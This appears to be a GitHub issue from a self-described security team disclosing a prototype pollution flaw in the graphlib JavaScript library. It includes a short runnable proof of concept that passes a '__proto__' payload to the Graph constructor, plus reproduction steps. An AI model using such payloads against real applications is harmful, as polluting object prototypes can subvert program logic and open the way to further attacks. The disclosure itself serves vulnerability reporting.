
Prototype Pollution in graphlib #230

@dfzysmy2tf-create

Description

Hi, we are a security team. We found a prototype pollution vulnerability in your project.
Vulnerability Type
Prototype Pollution
Vulnerability Cause
When creating graphs, nodes, and edges, graphlib deeply merges user-supplied config without filtering `__proto__`, causing global prototype pollution.
Vulnerable Code Location
Graph constructor, config-merging functions, and setDefault related methods.
POC (Runnable Directly)
```javascript
const graphlib = require('graphlib');
const evil = {"__proto__":{"inject":"success"}};

const g = new graphlib.Graph(evil);
console.log({}.inject); // Output: success
```

Reproduction Steps
1. Install: `npm i graphlib`
2. Create `poc.js` and paste the code above
3. Run: `node poc.js`
4. Output `success` confirms exploitation
